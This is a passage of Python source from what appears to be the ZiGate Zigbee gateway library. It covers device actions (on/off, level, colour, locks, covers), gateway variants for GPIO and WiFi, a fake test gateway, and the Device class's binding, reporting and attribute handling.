data = struct.pack('!BHBBHHBBHB', 2, addr, 1, endpoint, cluster,
0, direction, manufacturer_specific,
manufacturer_code, 255)
self.send_data(0x0140, data)
def available_actions(self, addr, endpoint=None):
'''
        Analyse specified endpoint to find available actions
actions are:
- onoff
- move
- lock
- ...
'''
device = self.get_device_from_addr(addr)
if device:
return device.available_actions(endpoint)
@register_actions(ACTIONS_ONOFF)
def action_onoff(self, addr, endpoint, onoff, on_time=0, off_time=0, effect=0, gradient=0):
'''
On/Off action
onoff : 0 - OFF
1 - ON
2 - Toggle
on_time : timed on in sec
off_time : timed off in sec
effect : effect id
gradient : effect gradient
Note that timed onoff and effect are mutually exclusive
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
cmd = 0x0092
if on_time or off_time:
cmd = 0x0093
data += struct.pack('!HH', on_time, off_time)
elif effect:
cmd = 0x0094
data = struct.pack('!BHBBBB', addr_mode, addr, 1, endpoint, effect, gradient)
return self.send_data(cmd, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level(self, addr, endpoint, onoff=OFF, mode=0, rate=0):
'''
move to level
mode 0 up, 1 down
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBBB', addr_mode, addr, 1, endpoint, onoff, mode, rate)
return self.send_data(0x0080, data)
@register_actions(ACTIONS_LEVEL)
def action_move_level_onoff(self, addr, endpoint, onoff=OFF, level=0, transition_time=0):
'''
move to level with on off
level between 0 - 100
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
level = int(level * 254 // 100)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint, onoff, level, transition_time)
return self.send_data(0x0081, data)
@register_actions(ACTIONS_LEVEL)
def action_move_step(self, addr, endpoint, onoff=OFF, step_mode=0, step_size=0, transition_time=0):
'''
move step
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBBBH', addr_mode, addr, 1, endpoint, onoff,
step_mode, step_size, transition_time)
return self.send_data(0x0082, data)
@register_actions(ACTIONS_LEVEL)
def action_move_stop_onoff(self, addr, endpoint, onoff=OFF):
'''
move stop on off
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, onoff)
return self.send_data(0x0084, data)
@register_actions(ACTIONS_HUE)
def action_move_hue(self, addr, endpoint, hue, direction=0, transition=0):
'''
move to hue
hue 0-360 in degrees
direction : 0 shortest, 1 longest, 2 up, 3 down
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
hue = int(hue * 254 // 360)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
hue, direction, transition)
return self.send_data(0x00B0, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_saturation(self, addr, endpoint, hue, saturation=100, transition=0):
'''
move to hue and saturation
hue 0-360 in degrees
saturation 0-100 in percent
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
hue = int(hue * 254 // 360)
saturation = int(saturation * 254 // 100)
data = struct.pack('!B' + addr_fmt + 'BBBBH', addr_mode, addr, 1, endpoint,
hue, saturation, transition)
return self.send_data(0x00B6, data)
@register_actions(ACTIONS_HUE)
def action_move_hue_hex(self, addr, endpoint, color_hex, transition=0):
'''
move to hue color in #ffffff
transition in second
'''
rgb = hex_to_rgb(color_hex)
return self.action_move_hue_rgb(addr, endpoint, rgb, transition)
@register_actions(ACTIONS_HUE)
def action_move_hue_rgb(self, addr, endpoint, rgb, transition=0):
'''
move to hue (r,g,b) example : (1.0, 1.0, 1.0)
transition in second
'''
hue, saturation, level = colorsys.rgb_to_hsv(*rgb)
hue = int(hue * 360)
saturation = int(saturation * 100)
level = int(level * 100)
self.action_move_level_onoff(addr, endpoint, ON, level, 0)
return self.action_move_hue_saturation(addr, endpoint, hue, saturation, transition)
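    # Worked example of the conversion above (values only, for illustration):
    # pure red rgb = (1.0, 0.0, 0.0) gives colorsys.rgb_to_hsv -> (0.0, 1.0, 1.0),
    # so hue = 0 degrees, saturation = 100 %, level = 100 %; the level is applied
    # first via action_move_level_onoff, then hue/saturation via 0x00B6.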
@register_actions(ACTIONS_COLOR)
def action_move_colour(self, addr, endpoint, x, y, transition=0):
'''
move to colour x y
        x, y can be an integer 0-65535 or a float 0-1.0
transition in second
'''
addr = self._translate_addr(addr)
        if isinstance(x, float) and x <= 1:
            x = min(int(x * 65536), 65535)  # clamp so 1.0 still fits in an unsigned short
        if isinstance(y, float) and y <= 1:
            y = min(int(y * 65536), 65535)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBHHH', addr_mode, addr, 1, endpoint,
x, y, transition)
return self.send_data(0x00B7, data)
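    # Sketch of the x/y scaling above (illustrative numbers): the CIE xy white
    # point x=0.3127, y=0.3290 becomes int(0.3127 * 65536) = 20493 and
    # int(0.3290 * 65536) = 21561 before being packed as unsigned shorts.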
@register_actions(ACTIONS_COLOR)
def action_move_colour_hex(self, addr, endpoint, color_hex, transition=0):
'''
move to colour #ffffff
convenient function to set color in hex format
transition in second
'''
x, y = hex_to_xy(color_hex)
return self.action_move_colour(addr, endpoint, x, y, transition)
@register_actions(ACTIONS_COLOR)
def action_move_colour_rgb(self, addr, endpoint, rgb, transition=0):
'''
move to colour (r,g,b) example : (1.0, 1.0, 1.0)
        convenient function to set colour from an (r, g, b) tuple
transition in second
'''
x, y = rgb_to_xy(rgb)
return self.action_move_colour(addr, endpoint, x, y, transition)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature(self, addr, endpoint, mired, transition=0):
'''
move colour to temperature
mired color temperature
transition in second
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBHH', addr_mode, addr, 1, endpoint,
mired, transition)
return self.send_data(0x00C0, data)
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_kelvin(self, addr, endpoint, temperature, transition=0):
'''
move colour to temperature
temperature unit is kelvin
transition in second
convenient function to use kelvin instead of mired
'''
temperature = int(1000000 // temperature)
return self.action_move_temperature(addr, endpoint, temperature, transition)
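    # Sketch of the kelvin -> mired conversion above: 2700 K warm white maps to
    # 1000000 // 2700 = 370 mired, 6500 K daylight to 1000000 // 6500 = 153 mired.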
@register_actions(ACTIONS_TEMPERATURE)
def action_move_temperature_rate(self, addr, endpoint, mode, rate, min_mired, max_mired):
'''
move colour temperature in specified rate towards given min or max value
Available modes:
- 0: Stop
- 1: Increase
- 3: Decrease
rate: how many temperature units are moved in one second
        min_mired: minimum temperature (in mired) where decreasing stops
        max_mired: maximum temperature (in mired) where increasing stops
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBBHHH', addr_mode, addr, 1, endpoint, mode, rate, min_mired, max_mired)
return self.send_data(0x00C1, data)
@register_actions(ACTIONS_LOCK)
def action_lock(self, addr, endpoint, lock):
'''
Lock / unlock
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
addr = self.__addr(addr)
data = struct.pack('!B' + addr_fmt + 'BBB', addr_mode, addr, 1, endpoint, lock)
return self.send_data(0x00f0, data)
@register_actions(ACTIONS_COVER)
def action_cover(self, addr, endpoint, cmd, param=None):
'''
Open, close, move, ...
cmd could be :
OPEN = 0x00
CLOSE = 0x01
STOP = 0x02
LIFT_VALUE = 0x04
LIFT_PERCENT = 0x05
TILT_VALUE = 0x07
TILT_PERCENT = 0x08
'''
addr = self._translate_addr(addr)
addr_mode, addr_fmt = self._choose_addr_mode(addr)
fmt = '!B' + addr_fmt + 'BBB'
addr = self.__addr(addr)
args = [addr_mode, addr, 1, endpoint, cmd]
if cmd in (0x04, 0x07):
fmt += 'H'
args.append(param)
elif cmd in (0x05, 0x08):
fmt += 'B'
args.append(param)
data = struct.pack(fmt, *args)
return self.send_data(0x00fa, data)
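    # Illustrative usage sketch (hypothetical address, not from this file):
    #   z.action_cover('1234', 1, 0x00)        # open
    #   z.action_cover('1234', 1, 0x05, 50)    # lift to 50 % (one-byte param)
    #   z.action_cover('1234', 1, 0x04, 120)   # lift to an absolute value (two-byte param)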
def raw_aps_data_request(self, addr, src_ep, dst_ep, profile, cluster, payload, addr_mode=2, security=0):
'''
Send raw APS Data request
'''
addr = self.__addr(addr)
length = len(payload)
radius = 0
data = struct.pack('!BHBBHHBBB{}s'.format(length), addr_mode, addr, src_ep, dst_ep,
cluster, profile, security, radius, length, payload)
return self.send_data(0x0530, data)
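    # Illustrative sketch (hypothetical values): send an arbitrary ZCL frame to
    # endpoint 1 of device '1234' on the Home Automation profile 0x0104,
    # On/Off cluster 0x0006; the payload bytes here are only an assumed example.
    #   z.raw_aps_data_request('1234', 1, 1, 0x0104, 0x0006, b'\x01\x01\x01')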
def set_TX_power(self, percent=100):
'''
Set TX Power between 0-100%
'''
percent = percent * 255 // 100
data = struct.pack('!B', percent)
return self.send_data(0x0806, data)
def get_TX_power(self):
'''
Get TX Power
'''
return self.send_data(0x0807, wait_response=0x8807)
def start_mqtt_broker(self, host='localhost:1883', username=None, password=None):
'''
Start a MQTT broker in a new thread
'''
from .mqtt_broker import MQTT_Broker
broker = MQTT_Broker(self, host, username, password)
broker.connect()
self.broker_thread = threading.Thread(target=broker.client.loop_forever,
name='ZiGate-MQTT')
        self.broker_thread.daemon = True
self.broker_thread.start()
def generate_templates(self, dirname='~'):
'''
Generate template file for each device
'''
for device in self._devices.values():
device.generate_template(dirname)
class FakeZiGate(ZiGate):
'''
Fake ZiGate for test only without real hardware
'''
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=False, auto_save=False, channel=None, adminpanel=False):
ZiGate.__init__(self, port=port, path=path, auto_start=auto_start, auto_save=auto_save,
channel=channel, adminpanel=adminpanel)
self._addr = '0000'
self._ieee = '0123456789abcdef'
# by default add a fake xiaomi temp sensor on address abcd
device = Device({'addr': 'abcd', 'ieee': '0123456789abcdef'}, self)
device.set_attribute(1, 0, {'attribute': 5, 'lqi': 170, 'data': 'lumi.weather'})
device.load_template()
self._devices['abcd'] = device
def startup(self, channel=None):
ZiGate.startup(self, channel=channel)
self.connection.start_fake_response()
def setup_connection(self):
self.connection = FakeTransport()
class ZiGateGPIO(ZiGate):
def __init__(self, port='auto', path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT) # GPIO2
self.set_running_mode()
ZiGate.__init__(self, port=port, path=path, auto_start=auto_start,
auto_save=auto_save, channel=channel, adminpanel=adminpanel)
def set_running_mode(self):
GPIO.output(27, GPIO.HIGH) # GPIO2
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # GPIO0
sleep(0.5)
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO0
sleep(0.5)
def set_bootloader_mode(self):
GPIO.output(27, GPIO.LOW) # GPIO2
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # GPIO0
sleep(0.5)
GPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP) # GPIO0
sleep(0.5)
def flash_firmware(self, path, erase_eeprom=False):
from .flasher import flash
self.set_bootloader_mode()
flash(self._port, write=path, erase=erase_eeprom)
self.set_running_mode()
def __del__(self):
GPIO.cleanup()
ZiGate.__del__(self)
def setup_connection(self):
self.connection = ThreadSerialConnection(self, self._port, '3f201')
class ZiGateWiFi(ZiGate):
def __init__(self, host, port=None, path='~/.zigate.json',
auto_start=True,
auto_save=True,
channel=None,
adminpanel=False):
self._host = host
ZiGate.__init__(self, port=port, path=path,
auto_start=auto_start,
auto_save=auto_save,
channel=channel,
adminpanel=adminpanel
)
def setup_connection(self):
self.connection = ThreadSocketConnection(self, self._host, self._port)
def reboot(self):
'''
ask zigate wifi to reboot
'''
import requests
requests.get('http://{}/reboot'.format(self._host))
class DeviceEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Device):
return obj.to_json()
if isinstance(obj, Cluster):
return obj.to_json()
if isinstance(obj, Response):
return obj.cleaned_data()
elif isinstance(obj, bytes):
return hexlify(obj).decode()
elif isinstance(obj, set):
return list(obj)
elif isinstance(obj, type):
return obj.__name__
return json.JSONEncoder.default(self, obj)
class Device(object):
def __init__(self, info=None, zigate_instance=None):
self._zigate = zigate_instance
self._lock = threading.Lock()
self.info = info or {}
self.endpoints = {}
self._expire_timer = {}
self.missing = False
self.genericType = ''
self.discovery = ''
def _lock_acquire(self):
LOGGER.debug('Acquire Lock on device %s', self)
r = self._lock.acquire(True, 5)
if not r:
LOGGER.error('Failed to acquire Lock on device %s', self)
def _lock_release(self):
LOGGER.debug('Release Lock on device %s', self)
if not self._lock.locked():
            LOGGER.error('Device Lock not locked for device %s!', self)
else:
self._lock.release()
def available_actions(self, endpoint_id=None):
'''
        Analyse the specified endpoint to find available actions
actions are:
- onoff
- move
- lock
- ...
'''
actions = {}
if not endpoint_id:
endpoint_id = list(self.endpoints.keys())
if not isinstance(endpoint_id, list):
endpoint_id = [endpoint_id]
for ep_id in endpoint_id:
actions[ep_id] = []
endpoint = self.endpoints.get(ep_id)
if endpoint:
# some light have device=0 so try to work around
if endpoint['device'] in ACTUATORS or (endpoint['device'] == 0 and self.receiver_on_when_idle()):
if 0x0006 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_ONOFF)
if 0x0008 in endpoint['in_clusters'] and endpoint['device'] != 0x010a:
# except device 0x010a because Tradfri Outlet don't have level control
# but still have endpoint 8...
actions[ep_id].append(ACTIONS_LEVEL)
if 0x0101 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_LOCK)
if 0x0102 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_COVER)
if 0x0201 in endpoint['in_clusters']:
actions[ep_id].append(ACTIONS_THERMOSTAT)
if 0x0300 in endpoint['in_clusters']:
# if endpoint['device'] in (0x0102, 0x0105):
if endpoint['device'] in (0x0105,):
actions[ep_id].append(ACTIONS_HUE)
elif endpoint['device'] in (0x010D, 0x0210):
actions[ep_id].append(ACTIONS_COLOR)
actions[ep_id].append(ACTIONS_HUE)
actions[ep_id].append(ACTIONS_TEMPERATURE)
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
actions[ep_id].append(ACTIONS_TEMPERATURE)
else: # 0x0200
actions[ep_id].append(ACTIONS_COLOR)
actions[ep_id].append(ACTIONS_HUE)
return actions
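    # Sketch of a typical return value (assumed device layout, for illustration
    # only): a dimmable light exposing clusters 0x0006 and 0x0008 on endpoint 1
    # would yield {1: [ACTIONS_ONOFF, ACTIONS_LEVEL]}; callers can then look up
    # the matching helper names in the ACTIONS mapping.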
def _create_actions(self):
'''
create convenient functions for actions
'''
a_actions = self.available_actions()
for endpoint_id, actions in a_actions.items():
for action in actions:
for func_name in ACTIONS.get(action, []):
func = getattr(self._zigate, func_name)
wfunc = functools.partial(func, self.addr, endpoint_id)
functools.update_wrapper(wfunc, func)
setattr(self, func_name, wfunc)
    def _bind_report(self, endpoint_id=None):
'''
automatically bind and report data
'''
if not BIND_REPORT:
return
        if endpoint_id:
            endpoints_list = [(endpoint_id, self.endpoints[endpoint_id])]
else:
endpoints_list = list(self.endpoints.items())
LOGGER.debug('Start automagic bind and report process for device %s', self)
for endpoint_id, endpoint in endpoints_list:
# if endpoint['device'] in ACTUATORS: # light
LOGGER.debug('Bind and report endpoint %s for device %s', endpoint_id, self)
if 0x0001 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0001')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0001)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0001, (0x0020, 0x20))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0001, (0x0021, 0x20))
if 0x0006 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0006')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0006)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0006, (0x0000, 0x10))
if 0x0008 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0008')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0008)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0008, (0x0000, 0x20))
if 0x000f in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x000f')
self._zigate.bind_addr(self.addr, endpoint_id, 0x000f)
self._zigate.reporting_request(self.addr, endpoint_id,
0x000f, (0x0055, 0x10))
if 0x0102 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0102')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0102)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0102, (0x0007, 0x20))
if 0x0201 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0201')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0201)
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0000, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0002, 0x18))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0008, 0x20))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0012, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x0014, 0x29))
self._zigate.reporting_request(self.addr, endpoint_id,
0x0201, (0x001C, 0x30))
if 0x0300 in endpoint['in_clusters']:
LOGGER.debug('bind and report for cluster 0x0300')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
if endpoint['device'] in (0x0105,):
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
elif endpoint['device'] in (0x010D, 0x0210):
# self._zigate.reporting_request(self.addr,
# endpoint_id,
# 0x0300, [(0x0000, 0x20),
# (0x0001, 0x20),
# (0x0003, 0x21),
# (0x0004, 0x21),
# (0x0007, 0x21),
# ])
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0003, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0004, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0007, 0x21))
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0007, 0x21))
else: # 0x0200
# self._zigate.reporting_request(self.addr,
# endpoint_id,
# 0x0300, [(0x0000, 0x20),
# (0x0001, 0x20),
# (0x0003, 0x21),
# (0x0004, 0x21),
# ])
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0000, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0001, 0x20))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0003, 0x21))
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0300, (0x0004, 0x21))
if 0xFC00 in endpoint['in_clusters']:
LOGGER.debug('bind for cluster 0xFC00')
self._zigate.bind_addr(self.addr, endpoint_id, 0xFC00)
if 0x0702 in endpoint['in_clusters']:
LOGGER.debug('bind for cluster 0x0702')
self._zigate.bind_addr(self.addr, endpoint_id, 0x0702)
self._zigate.reporting_request(self.addr,
endpoint_id,
0x0702, (0x0000, 0x25))
@staticmethod
def from_json(data, zigate_instance=None):
d = Device(zigate_instance=zigate_instance)
d.info = data.get('info', {})
d.genericType = data.get('generictype', '')
d.discovery = data.get('discovery', '')
for ep in data.get('endpoints', []):
if 'attributes' in ep: # old version
LOGGER.debug('Old version found, convert it')
for attribute in ep['attributes'].values():
endpoint_id = attribute['endpoint']
cluster_id = attribute['cluster']
data = {'attribute': attribute['attribute'],
'data': attribute['data'],
}
d.set_attribute(endpoint_id, cluster_id, data)
else:
endpoint = d.get_endpoint(ep['endpoint'])
endpoint['profile'] = ep.get('profile', 0)
endpoint['device'] = ep.get('device', 0)
endpoint['in_clusters'] = ep.get('in_clusters', [])
endpoint['out_clusters'] = ep.get('out_clusters', [])
for cl in ep['clusters']:
cluster = Cluster.from_json(cl, endpoint, d)
endpoint['clusters'][cluster.cluster_id] = cluster
if 'power_source' in d.info: # old version
d.info['power_type'] = d.info.pop('power_source')
if 'manufacturer' in d.info: # old version
d.info['manufacturer_code'] = d.info.pop('manufacturer')
if 'rssi' in d.info: # old version
d.info['lqi'] = d.info.pop('rssi')
d._avoid_duplicate()
return d
def to_json(self, properties=False):
r = {'addr': self.addr,
'info': self.info,
'endpoints': [{'endpoint': k,
'clusters': list(v['clusters'].values()),
'profile': v['profile'],
'device': v['device'],
'in_clusters': v['in_clusters'],
'out_clusters': v['out_clusters']
} for k, v in self.endpoints.items()],
'generictype': self.genericType,
'discovery': self.discovery
}
if properties:
r['properties'] = list(self.properties)
return r
def __str__(self):
name = self.get_property_value('type', '')
manufacturer = self.get_property_value('manufacturer', 'Device')
return '{} {} ({}) {}'.format(manufacturer, name, self.info.get('addr'), self.info.get('ieee'))
def __repr__(self):
return self.__str__()
@property
def addr(self):
return self.info['addr']
@property
def ieee(self):
ieee = self.info.get('ieee')
if ieee is None:
            LOGGER.error('IEEE is missing for %s, please pair it again!', self.addr)
return ieee
@property
def rssi(self): # compat
return self.lqi
@rssi.setter
def rssi(self, value): # compat
self.lqi = value
@property
def lqi(self):
return self.info.get('lqi', 0)
@lqi.setter
def lqi(self, value):
self.info['lqi'] = value
@property
def last_seen(self):
return self.info.get('last_seen')
@property
def battery_percent(self):
percent = self.get_property_value('battery_percent')
if not percent:
percent = 100
if self.info.get('power_type') == 0:
power_source = self.get_property_value('power_source')
if power_source is None:
power_source = 3
battery_voltage = self.get_property_value('battery_voltage')
if power_source == 3: # battery
power_source = 3.1
if power_source and battery_voltage:
power_end = 0.9 * power_source
percent = (battery_voltage - power_end) * 100 / (power_source - power_end)
if percent > 100:
percent = 100
return percent
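    # Worked example of the voltage-to-percent estimate above (illustrative
    # numbers): a battery device reporting power_source 3 V (treated as 3.1 V)
    # and battery_voltage 2.95 V gives power_end = 0.9 * 3.1 = 2.79 V and
    # percent = (2.95 - 2.79) * 100 / (3.1 - 2.79) ~= 51.6 %.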
@property
def rssi_percent(self): # compat
return self.lqi_percent
@property
def lqi_percent(self):
return round(100 * self.lqi / 255)
def get_type(self, wait=True):
typ = self.get_value('type')
if typ is None:
for endpoint in self.endpoints:
if 0 in self.endpoints[endpoint]['in_clusters'] or not self.endpoints[endpoint]['in_clusters']:
self._zigate.read_attribute_request(self.addr,
endpoint,
0x0000,
[0x0004, 0x0005]
)
if 0 in self.endpoints[endpoint]['in_clusters']:
break
if not wait or not self.endpoints:
return
# wait for type
t1 = time()
while self.get_value('type') is None:
sleep(0.01)
t2 = time()
if t2 - t1 > WAIT_TIMEOUT:
LOGGER.warning('No response waiting for type')
return
typ = self.get_value('type')
return typ
def refresh_device(self, full=False):
to_read = {}
if full:
for attribute in self.attributes:
k = (attribute['endpoint'], attribute['cluster'])
if k not in to_read:
to_read[k] = []
to_read[k].append(attribute['attribute'])
else:
endpoints_list = list(self.endpoints.items())
for endpoint_id, endpoint in endpoints_list:
if 0x0006 in endpoint['in_clusters']:
k = (endpoint_id, 0x0006)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
if 0x0008 in endpoint['in_clusters']:
k = (endpoint_id, 0x0008)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
if 0x000f in endpoint['in_clusters']:
k = (endpoint_id, 0x000f)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0055)
if 0x0102 in endpoint['in_clusters']:
k = (endpoint_id, 0x0102)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0007)
if 0x0201 in endpoint['in_clusters']:
k = (endpoint_id, 0x0201)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
to_read[k].append(0x0002)
to_read[k].append(0x0008)
to_read[k].append(0x0012)
to_read[k].append(0x0014)
to_read[k].append(0x001C)
if 0x0300 in endpoint['in_clusters']:
k = (endpoint_id, 0x0300)
if k not in to_read:
to_read[k] = []
self._zigate.bind_addr(self.addr, endpoint_id, 0x0300)
if endpoint['device'] in (0x0105,):
to_read[k].append(0x0000)
to_read[k].append(0x0001)
elif endpoint['device'] in (0x010D, 0x0210):
to_read[k].append(0x0000)
to_read[k].append(0x0001)
to_read[k].append(0x0003)
to_read[k].append(0x0004)
to_read[k].append(0x0007)
elif endpoint['device'] in (0x0102, 0x010C, 0x0220):
to_read[k].append(0x0007)
else: # 0x0200
to_read[k].append(0x0000)
to_read[k].append(0x0001)
to_read[k].append(0x0003)
to_read[k].append(0x0004)
if 0x0702 in endpoint['in_clusters']:
k = (endpoint_id, 0x0702)
if k not in to_read:
to_read[k] = []
to_read[k].append(0x0000)
for k, attributes in to_read.items():
endpoint, cluster = k
self._zigate.read_attribute_request(self.addr,
endpoint,
cluster,
attributes)
def discover_device(self):
self._zigate.discover_device(self.addr)
def identify_device(self, time_sec=5):
'''
send identify command
        time_sec is the duration in seconds
'''
ep = list(self.endpoints.keys())
ep.sort()
if ep:
endpoint = ep[0]
else:
endpoint = 1
self._zigate.identify_send(self.addr, endpoint, time_sec)
def __setitem__(self, key, value):
self.info[key] = value
def __getitem__(self, key):
return self.info[key]
def __delitem__(self, key):
return self.info.__delitem__(key)
def get(self, key, default):
return self.info.get(key, default)
def __contains__(self, key):
return self.info.__contains__(key)
def __len__(self):
return len(self.info)
def __iter__(self):
return self.info.__iter__()
def items(self):
return self.info.items()
def keys(self):
return self.info.keys()
# def __getattr__(self, attr):
# return self.info[attr]
def update(self, device):
'''
update from other device
'''
self._lock_acquire()
self.info.update(device.info)
self._merge_endpoints(device.endpoints)
self.genericType = self.genericType or device.genericType
# self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
self._lock_release()
def _merge_endpoints(self, endpoints):
for endpoint_id, endpoint in endpoints.items():
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = endpoint
else:
myendpoint = self.endpoints[endpoint_id]
if 'clusters' not in myendpoint:
myendpoint['clusters'] = {}
myendpoint['profile'] = endpoint.get('profile') or myendpoint.get('profile', 0)
myendpoint['device'] = endpoint.get('device') or myendpoint.get('device', 0)
myendpoint['in_clusters'] = endpoint.get('in_clusters') or myendpoint.get('in_clusters', [])
myendpoint['out_clusters'] = endpoint.get('out_clusters') or myendpoint.get('out_clusters', [])
for cluster_id, cluster in endpoint['clusters'].items():
if cluster_id not in myendpoint['clusters']:
myendpoint['clusters'][cluster_id] = cluster
else:
mycluster = myendpoint['clusters'][cluster_id]
for attribute in cluster.attributes.values():
mycluster.update(attribute)
def update_info(self, info):
self._lock_acquire()
self.info.update(info)
self._lock_release()
def get_endpoint(self, endpoint_id):
self._lock_acquire()
if endpoint_id not in self.endpoints:
self.endpoints[endpoint_id] = {'clusters': {},
'profile': 0,
'device': 0,
'in_clusters': [],
'out_clusters': [],
}
self._lock_release()
return self.endpoints[endpoint_id]
def get_cluster(self, endpoint_id, cluster_id):
endpoint = self.get_endpoint(endpoint_id)
self._lock_acquire()
if cluster_id not in endpoint['clusters']:
cluster = get_cluster(cluster_id, endpoint, self)
endpoint['clusters'][cluster_id] = cluster
self._lock_release()
return endpoint['clusters'][cluster_id]
def set_attribute(self, endpoint_id, cluster_id, data):
added = False
lqi = data.pop('lqi', 0)
if lqi > 0:
self.info['lqi'] = lqi
self.info['last_seen'] = strftime('%Y-%m-%d %H:%M:%S')
self.missing = False
cluster = self.get_cluster(endpoint_id, cluster_id)
self._lock_acquire()
r = cluster.update(data)
if r:
added, attribute = r
if 'expire' in attribute:
self._set_expire_timer(endpoint_id, cluster_id,
attribute['attribute'],
attribute['expire'])
self._avoid_duplicate()
self._lock_release()
if not r:
return
return added, attribute['attribute']
def _set_expire_timer(self, endpoint_id, cluster_id, attribute_id, expire):
LOGGER.debug('Set expire timer for %s-%s-%s in %s', endpoint_id,
cluster_id,
attribute_id,
expire)
k = (endpoint_id, cluster_id, attribute_id)
timer = self._expire_timer.get(k)
if timer:
LOGGER.debug('Cancel previous Timer %s', timer)
timer.cancel()
timer = threading.Timer(expire,
functools.partial(self._reset_attribute,
endpoint_id,
cluster_id,
attribute_id))
        timer.daemon = True
timer.start()
self._expire_timer[k] = timer
def _reset_attribute(self, endpoint_id, cluster_id, attribute_id):
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id)
value = attribute['value']
if 'expire_value' in attribute:
new_value = attribute['expire_value']
elif 'type' in attribute:
new_value = attribute['type']()
else:
new_value = type(value)()
attribute['value'] = new_value
attribute['data'] = new_value
attribute = self.get_attribute(endpoint_id,
cluster_id,
attribute_id,
True)
dispatch_signal(ZIGATE_ATTRIBUTE_UPDATED, self._zigate,
**{'zigate': self._zigate,
'device': self,
'attribute': attribute})
def get_attribute(self, endpoint_id, cluster_id, attribute_id,
